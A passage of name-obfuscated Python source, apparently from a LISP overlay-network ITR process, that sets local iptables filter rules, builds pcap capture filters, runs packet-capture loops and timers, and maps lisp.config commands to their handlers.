OOo00OO0O0O += sources + lisp . lisp_get_all_addresses ( )
for OO0 in OOo00OO0O0O :
if ( lisp . lisp_is_mac_string ( OO0 ) ) : continue
iIiiIi11IIi = "" if OO0 . find ( ":" ) == - 1 else "6"
os . system ( Oo00OO0OO . format ( iIiiIi11IIi , OO0 ) )
if 64 - 64: OoooooooOO . I1ii11iIi11i % O0 + I1IiiI - o0oOOo0O0Ooo
if 84 - 84: i11iIiiIii * Ii1I . i11iIiiIii
if 12 - 12: OoOoOO00 % IiII % I1ii11iIi11i . i11iIiiIii * iIii1I11I1II1
if 66 - 66: i11iIiiIii * iIii1I11I1II1 % OoooooooOO
if 5 - 5: OoOoOO00 % OoooooooOO
if 60 - 60: OoOoOO00 . i1IIi % OoO0O00 % ooOoO0o % OOooOOo
if 33 - 33: iIii1I11I1II1 - Ii1I * I1ii11iIi11i % iIii1I11I1II1 + OoO0O00 . OOooOOo
if 56 - 56: i11iIiiIii * iII111i . oO0o
if ( lisp . lisp_pitr == False ) :
Oo00OO0OO = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
ooooO0O = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for o0OO0 in sources :
if ( lisp . lisp_is_mac_string ( o0OO0 ) ) : continue
if ( o0OO0 in dyn_eids ) : continue
iIiiIi11IIi = "" if o0OO0 . find ( ":" ) == - 1 else "6"
for O0OOO0OOoO0O in sources :
if ( lisp . lisp_is_mac_string ( O0OOO0OOoO0O ) ) : continue
if ( O0OOO0OOoO0O in dyn_eids ) : continue
if ( O0OOO0OOoO0O . find ( "." ) != - 1 and o0OO0 . find ( "." ) == - 1 ) : continue
if ( O0OOO0OOoO0O . find ( ":" ) != - 1 and o0OO0 . find ( ":" ) == - 1 ) : continue
if ( getoutput ( ooooO0O . format ( iIiiIi11IIi , o0OO0 , O0OOO0OOoO0O ) ) == "" ) :
continue
if 81 - 81: i1IIi % o0oOOo0O0Ooo - I1Ii111 + i11iIiiIii - OoooooooOO
os . system ( Oo00OO0OO . format ( iIiiIi11IIi , o0OO0 , O0OOO0OOoO0O ) )
if 50 - 50: Ii1I - i11iIiiIii + iIii1I11I1II1 / O0 - Ii1I + o0oOOo0O0Ooo
if 22 - 22: II111iiii - Ii1I / ooOoO0o % OoooooooOO + OOooOOo
if 5 - 5: OoO0O00 / iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
iii1IiI1I1 = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for o0OO0 in sources :
if ( lisp . lisp_is_mac_string ( o0OO0 ) ) : continue
iIiiIi11IIi = "" if o0OO0 . find ( ":" ) == - 1 else "6"
os . system ( iii1IiI1I1 . format ( iIiiIi11IIi , o0OO0 ) )
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
oo000oO = getoutput ( "sudo iptables -t raw -S lisp" ) . split ( "\n" )
oo000oO += getoutput ( "sudo ip6tables -t raw -S lisp" ) . split ( "\n" )
lisp . lprint ( "Using kernel filters: {}" . format ( oo000oO ) )
if 78 - 78: Ii1I + OoOoOO00 + IiII - IiII . i11iIiiIii / OoO0O00
if 27 - 27: Ii1I - O0 % I11i * I1Ii111 . IiII % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % ooOoO0o
if 24 - 24: OoOoOO00
if 94 - 94: i1IIi * i1IIi % II111iiii + OOooOOo
if 28 - 28: I1IiiI
if 49 - 49: I11i . o0oOOo0O0Ooo % oO0o / Ii1I
if 95 - 95: O0 * OoOoOO00 * IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if ( os . getenv ( "LISP_VIRTIO_BUG" ) != None ) :
oO00o = ( "sudo iptables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 36 - 36: I1Ii111 . II111iiii % ooOoO0o
oO00o += ( "sudo iptables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill; " )
if 84 - 84: OoooooooOO - i11iIiiIii / iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i
oO00o += ( "sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
oO00o += ( "sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill" )
if 17 - 17: OoO0O00 * OoOoOO00
os . system ( oO00o )
ii11i = lisp . bold ( "virtio" , False )
lisp . lprint ( "{} bug workaround, configure '{}'" . format ( ii11i , oO00o ) )
if 71 - 71: I1Ii111 / I1ii11iIi11i * iIii1I11I1II1
return
if 57 - 57: OOooOOo + I1Ii111 % I1ii11iIi11i . OoO0O00 / OoO0O00 * O0
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if 37 - 37: Oo0Ooo / IiII * O0
if 73 - 73: iII111i * iII111i / ooOoO0o
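# Appears to build the pcap filter string: exclude ARP, match packets sourced
# from the configured EID-prefixes, exclude packets destined to local
# (non-dynamic) EIDs or to the router's own addresses, and always include the
# RLOC-probe-reply and multicast-decap clauses. L2-overlay and PITR modes
# relax parts of the filter.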
def o00oOo0oOoo ( sources , dyn_eids , l2_overlay , pitr ) :
if ( l2_overlay ) :
i1I11IiI1iiII = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
if 41 - 41: I1ii11iIi11i + Ii1I % OoooooooOO . I1ii11iIi11i + iII111i . iII111i
Iiii11I = "(not ether proto 0x806)"
OO00OO0O0 = " or (udp src port 4342 and ip[28] == 0x28)"
OO0ooo0 = " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 7 - 7: I1ii11iIi11i - oO0o * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i
if 85 - 85: O0
Iii = ""
IiI1I1 = ""
for o0OO0 in sources :
iI111i11iI1 = o0OO0
if ( lisp . lisp_is_mac_string ( o0OO0 ) ) :
iI111i11iI1 = o0OO0 . split ( "/" ) [ 0 ]
iI111i11iI1 = iI111i11iI1 . replace ( "-" , "" )
III1ii = [ ]
for IIiiii in range ( 0 , 12 , 2 ) : III1ii . append ( iI111i11iI1 [ IIiiii : IIiiii + 2 ] )
iI111i11iI1 = "ether host " + ":" . join ( III1ii )
if 23 - 23: oO0o * iII111i
if 53 - 53: Ii1I - OoOoOO00 . iII111i . I1Ii111
Iii += "{}" . format ( iI111i11iI1 )
if ( o0OO0 not in dyn_eids ) : IiI1I1 += "{}" . format ( iI111i11iI1 )
if ( sources [ - 1 ] == o0OO0 ) : break
Iii += " or "
if ( o0OO0 not in dyn_eids ) : IiI1I1 += " or "
if 48 - 48: iII111i + IiII
if ( IiI1I1 [ - 4 : : ] == " or " ) : IiI1I1 = IiI1I1 [ 0 : - 4 ]
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
I1IiI1iIiIiii = getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
I1IiI1iIiIiii = ( I1IiI1iIiIiii != "" and I1IiI1iIiIiii [ 0 ] == " " )
I1iiI1II = lisp . lisp_get_loopback_address ( ) if ( I1IiI1iIiIiii ) else None
if 44 - 44: Oo0Ooo / i1IIi + iIii1I11I1II1 / iIii1I11I1II1 * iIii1I11I1II1 . Ii1I
Oo = ""
ii1IIi1ii = lisp . lisp_get_all_addresses ( )
for OO0 in ii1IIi1ii :
if ( OO0 == I1iiI1II ) : continue
Oo += "{}" . format ( OO0 )
if ( ii1IIi1ii [ - 1 ] == OO0 ) : break
Oo += " or "
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if ( Iii != "" ) :
Iii = " and (src net {})" . format ( Iii )
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if ( IiI1I1 != "" ) :
IiI1I1 = " and not (dst net {})" . format ( IiI1I1 )
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if ( Oo != "" ) :
Oo = " and not (dst host {})" . format ( Oo )
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if ( pitr ) :
IiI1I1 = ""
Oo = Oo . replace ( "dst " , "" )
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
i1I11IiI1iiII = Iiii11I + Iii + IiI1I1 + Oo
i1I11IiI1iiII += OO00OO0O0
i1I11IiI1iiII += OO0ooo0
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
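# Appears to be the per-interface capture loop: it opens the device with
# pcappy (Python 2) or pcapy (Python 3) under a shared lock, applies the
# filter, and feeds each captured frame to the pcap callback above.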
def iiiI1I1iIIIi1 ( device , pfilter , pcap_lock ) :
lisp . lisp_set_exception ( )
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if ( lisp . lisp_is_python2 ( ) ) :
import pcappy
pcap_lock . acquire ( )
O00O = pcappy . open_live ( device , 9000 , 0 , 100 )
pcap_lock . release ( )
O00O . filter = pfilter
O00O . loop ( - 1 , Iiii1ii , device )
if 2 - 2: oO0o . I1Ii111 * Oo0Ooo + O0 - I11i * iIii1I11I1II1
if ( lisp . lisp_is_python3 ( ) ) :
import pcapy
pcap_lock . acquire ( )
O00O = pcapy . open_live ( device , 9000 , 0 , 100 )
pcap_lock . release ( )
O00O . setfilter ( pfilter )
while ( True ) :
II111i1ii1iII , ooo0OoO = O00O . next ( )
Iiii1ii ( device , None , ooo0OoO )
if 50 - 50: I1IiiI * OOooOOo + ooOoO0o
if 88 - 88: I11i + i11iIiiIii % oO0o * OOooOOo * OOooOOo * Ii1I
return
if 24 - 24: ooOoO0o / iII111i + IiII . IiII
if 39 - 39: ooOoO0o + O0 / i1IIi % IiII / oO0o * IiII
if 77 - 77: IiII . I1Ii111 % OoOoOO00
if 42 - 42: IiII % iII111i % o0oOOo0O0Ooo % oO0o + I11i % OoOoOO00
if 3 - 3: oO0o
if 64 - 64: OoO0O00 . I1IiiI - OoooooooOO . ooOoO0o - iII111i
if 77 - 77: Ii1I % OoOoOO00 / II111iiii % iII111i % OoooooooOO % OoO0O00
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
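# Appears to send periodic Info-Requests (used for NAT traversal) and then
# reschedule itself on a lisp.LISP_INFO_INTERVAL timer.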
def I1I1i1i ( ) :
global I11
global II1Ii1iI1i
global II1iII1i
if 87 - 87: OoOoOO00 / IiII . ooOoO0o - OOooOOo / OoO0O00
lisp . lisp_set_exception ( )
if 41 - 41: II111iiii
if 27 - 27: Oo0Ooo * OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
iiiii111 = [ II1Ii1iI1i , II1Ii1iI1i ,
oO0oIIII ]
lisp . lisp_build_info_requests ( iiiii111 , None , lisp . LISP_CTRL_PORT )
if 93 - 93: oO0o * Ii1I
if 27 - 27: I1IiiI * ooOoO0o
if 77 - 77: IiII
if 66 - 66: iIii1I11I1II1 . i11iIiiIii / I11i / ooOoO0o + I1Ii111
I11 . cancel ( )
I11 = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
I1I1i1i , [ ] )
I11 . start ( )
return
if 5 - 5: OoOoOO00 % iII111i + IiII
if 13 - 13: IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
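# Appears to handle the "lisp map-resolver" configuration command: it records
# the map-resolver, schedules a test of it, and starts the Info-Request timer
# defined above.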
def I1IiiIiii1 ( kv_pair ) :
global II1iII1i
global iiI1iIiI
global I11
if 39 - 39: ooOoO0o / O0 * IiII
lispconfig . lisp_map_resolver_command ( kv_pair )
if 17 - 17: Ii1I / iIii1I11I1II1 - OoO0O00 + I1IiiI % OOooOOo
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
if 14 - 14: o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
if 76 - 76: OoO0O00 - i11iIiiIii + OoOoOO00 + OOooOOo / OoooooooOO
if 50 - 50: II111iiii - I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1
if 91 - 91: II111iiii - O0 . iIii1I11I1II1 . O0 + I1ii11iIi11i - II111iiii
if 26 - 26: o0oOOo0O0Ooo
I11 = threading . Timer ( 0 , I1I1i1i , [ ] )
I11 . start ( )
return
if 12 - 12: OoooooooOO / O0 + II111iiii * I1ii11iIi11i
if 46 - 46: II111iiii - IiII * OoooooooOO / oO0o % IiII
if 11 - 11: iIii1I11I1II1 . OoOoOO00 / IiII % ooOoO0o
if 61 - 61: ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
def OOoOOOO00 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
return
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
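# Appears to handle the "lisp xtr-parameters" command: it applies the generic
# xTR settings, (re)starts RLOC-probing when NAT traversal or probing has just
# been enabled, records the ephemeral port used for lisp-crypto, and pushes
# the logging parameters to the external data plane.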
def OoOooOO0oOOo0O ( kv_pair ) :
global i111I
if 42 - 42: iII111i / o0oOOo0O0Ooo + Oo0Ooo . Oo0Ooo % OOooOOo
if 16 - 16: i1IIi + OoO0O00 % OoOoOO00 + Ii1I * Oo0Ooo
if 3 - 3: i11iIiiIii
if 81 - 81: I1IiiI . OoooooooOO * Ii1I . oO0o - O0 * oO0o
if 72 - 72: II111iiii - OOooOOo + I1IiiI - I11i
oO00O = lisp . lisp_nat_traversal
II111IiiiI1 = lisp . lisp_rloc_probing
if 75 - 75: ooOoO0o
if 29 - 29: I1ii11iIi11i
if 53 - 53: i11iIiiIii . I1ii11iIi11i % Ii1I / ooOoO0o % iIii1I11I1II1
if 6 - 6: Oo0Ooo - OOooOOo . iIii1I11I1II1
lispconfig . lisp_xtr_command ( kv_pair )
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
oOOOOOo = ( oO00O == False and lisp . lisp_nat_traversal and lisp . lisp_rloc_probing )
if 50 - 50: I1Ii111 + ooOoO0o + iII111i
ii11iiI11I = ( II111IiiiI1 == False and lisp . lisp_rloc_probing )
if 96 - 96: iIii1I11I1II1 + i11iIiiIii - Oo0Ooo . ooOoO0o
iiIi11i1IiI = 0
if ( ii11iiI11I ) : iiIi11i1IiI = 1
if ( oOOOOOo ) : iiIi11i1IiI = 5
if 88 - 88: I1ii11iIi11i - Ii1I * OoOoOO00
if ( iiIi11i1IiI != 0 ) :
OOOOO0o0OOo = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( iiIi11i1IiI , OOOOO0o0OOo )
if 40 - 40: IiII * oO0o % I11i * I1ii11iIi11i
if 80 - 80: iIii1I11I1II1 - OoooooooOO - I1ii11iIi11i - I1ii11iIi11i . OoooooooOO
if 48 - 48: I1Ii111 . i11iIiiIii / i1IIi % IiII % iII111i + oO0o
if 41 - 41: IiII
if 3 - 3: IiII + II111iiii / iIii1I11I1II1
if 10 - 10: II111iiii . O0
if 31 - 31: oO0o / i11iIiiIii / O0
if ( lisp . lisp_crypto_ephem_port == None and lisp . lisp_data_plane_security ) :
oOo00Oo0o0Oo = i111I . getsockname ( ) [ 1 ]
lisp . lisp_crypto_ephem_port = oOo00Oo0o0Oo
lisp . lprint ( "Use port {} for lisp-crypto packets" . format ( oOo00Oo0o0Oo ) )
iiI1ii = { "type" : "itr-crypto-port" , "port" : oOo00Oo0o0Oo }
lisp . lisp_write_to_dp_socket ( iiI1ii )
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
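# Appears to process "nonce%" IPC messages that maintain per-RLOC echo-nonce
# state: opcode "R" records a received request-nonce and starts echoing it,
# while "E" records an echoed nonce and, if it matches the one this ITR
# requested, ends request-nonce mode.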
def I1i1II1 ( ipc ) :
oOOoo , I1oo , iiI1IIIii , oOO0o00O = ipc . split ( "%" )
oOO0o00O = int ( oOO0o00O , 16 )
if 24 - 24: I1IiiI . I1Ii111 % Ii1I
OOoooo0oo = lisp . lisp_get_echo_nonce ( None , iiI1IIIii )
if ( OOoooo0oo == None ) : OOoooo0oo = lisp . lisp_echo_nonce ( iiI1IIIii )
if 92 - 92: oO0o / OOooOOo . I1ii11iIi11i
if 30 - 30: Ii1I . I1ii11iIi11i / OOooOOo
if 2 - 2: IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
if ( I1oo == "R" ) :
OOoooo0oo . request_nonce_rcvd = oOO0o00O
OOoooo0oo . last_request_nonce_rcvd = lisp . lisp_get_timestamp ( )
OOoooo0oo . echo_nonce_sent = oOO0o00O
OOoooo0oo . last_new_echo_nonce_sent = lisp . lisp_get_timestamp ( )
lisp . lprint ( "Start echo-nonce mode for {}, nonce 0x{}" . format ( lisp . red ( OOoooo0oo . rloc_str , False ) , lisp . lisp_hex_string ( oOO0o00O ) ) )
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if ( I1oo == "E" ) :
OOoooo0oo . echo_nonce_rcvd = oOO0o00O
OOoooo0oo . last_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if ( OOoooo0oo . request_nonce_sent == oOO0o00O ) :
Ii1ii1IiiiiiI = lisp . bold ( "echoed nonce" , False )
lisp . lprint ( "Received {} {} from {}" . format ( Ii1ii1IiiiiiI ,
lisp . lisp_hex_string ( oOO0o00O ) ,
lisp . red ( OOoooo0oo . rloc_str , False ) ) )
if 77 - 77: i11iIiiIii
OOoooo0oo . request_nonce_sent = None
lisp . lprint ( "Stop request-nonce mode for {}" . format ( lisp . red ( OOoooo0oo . rloc_str , False ) ) )
if 20 - 20: I11i * I1IiiI
OOoooo0oo . last_good_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
else :
o0oO0o0oo0O0 = "none"
if ( OOoooo0oo . request_nonce_sent ) :
o0oO0o0oo0O0 = lisp . lisp_hex_string ( OOoooo0oo . request_nonce_sent )
if 98 - 98: IiII * iIii1I11I1II1 . Ii1I * Oo0Ooo / I1ii11iIi11i + ooOoO0o
lisp . lprint ( ( "Received echo-nonce 0x{} from {}, but request-" + "nonce is {}" ) . format ( lisp . lisp_hex_string ( oOO0o00O ) ,
# oO0o . OoooooooOO
lisp . red ( OOoooo0oo . rloc_str , False ) , o0oO0o0oo0O0 ) )
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
return
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
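# Appears to be the command dispatch table: it maps lisp.config clauses and
# "show" commands to their handler functions, together with the allowed
# keywords and value ranges for each clause.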
o00000oo00 = {
"lisp xtr-parameters" : [ OoOooOO0oOOo0O , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"multi-tenant-eid" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-device" : [ True ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ I1IiiIiii1 , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-server" : [ lispconfig . lisp_map_server_command , {
"ms-name" : [ True ] ,
"address" : [ True ] ,
"dns-name" : [ True ] ,
"authentication-type" : [ False , "sha1" , "sha2" ] ,
"authentication-key" : [ False ] ,
"encryption-key" : [ False ] ,
"proxy-reply" : [ False , "yes" , "no" ] ,
"want-map-notify" : [ False , "yes" , "no" ] ,
"merge-registrations" : [ False , "yes" , "no" ] ,
"refresh-registrations" : [ False , "yes" , "no" ] ,
"site-id" : [ False , 1 , 0xffffffffffffffff ] } ] ,
"lisp database-mapping" : [ OOoOOOO00 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"register-ttl" : [ True , 1 , 0xffffffff ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"subscribe-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp itr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"show itr-map-cache" : [ IIiiIiI1 , { } ] ,
"show itr-rloc-probing" : [ I1i1iii , { } ] ,
"show itr-keys" : [ oo , { } ] ,
"show itr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 41 - 41: OOooOOo - o0oOOo0O0Ooo + Ii1I
if 15 - 15: I11i / o0oOOo0O0Ooo + Ii1I
if 76 - 76: Ii1I + OoooooooOO / OOooOOo % OoO0O00 / I1ii11iIi11i
